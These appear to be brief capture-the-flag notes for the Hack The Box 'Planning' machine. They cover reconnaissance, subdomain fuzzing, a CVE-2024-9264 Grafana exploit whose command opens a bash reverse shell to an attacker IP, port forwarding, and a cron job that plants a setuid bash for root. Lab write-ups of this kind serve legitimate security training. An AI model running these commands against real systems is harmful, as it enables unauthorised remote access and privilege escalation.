Back

Planning

• Hack The Box

• nmap -p22,80 --min-rate=1000 -T4 -A -oN planning.nmap <target_ip>

• add to /etc/hosts and explore

• fuzz subdomains:

  ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -u http://<ip> -H "Host: FUZZ.planning.htb/" -t 100
  

  (use host header) or gobuster vhost -w wl/wl.txt -u http://planning.htb -ad planning.htb (append domain)

• get version and search for CVE's (+login to dashboard)

[!hint] CVE-2024-9264 script payload:

uv run CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c 'bash -c "bash -i >& /dev/tcp/10.10.14.45/443 0>&1"' http://grafana.planning.htb

Environment Inspection:

• sudo -l
• find . -type f
• netstat -tulnp or ss -tulnp

• grep -R <port> 2>/dev/null /etc/ or curl -v localhost:port

• search inside - /var/www/ get password for the database - /opt/ and from /etc/systemd get list of files (services) - search related to crontab

Port Forwarding:

• forward all of the locally available ports and start accessing them to see if any of them could be valuable to us - ssh -L 8000:127.0.0.1:8000 -L 3000:127.0.0.1:3000 -L 33051:127.0.0.1:33051 -L 33060:127.0.0.1:33060 enzo@planning.htb

[!bug] Exploit (): create new cronjob - cp /bin/bash /tmp/23; chmod 6777 /tmp/23 or add additional command after the cleanup.sh - chmod u+s /bin/bash

cat /proc/net/fib_trie:

• kernel's internal Forwarding Information Base (FIB) displayed through a data structure called a trie - a prefix tree the kernel uses to perform lightning-fast longest-prefix-match lookups for IP routing.
• is a nice way to confirm how the kernel has actually resolved routing, especially when policy routing, multipath, VRFs, or container networking adds layers of complexity.
• The file isn't a config file; it's a diagnostic window.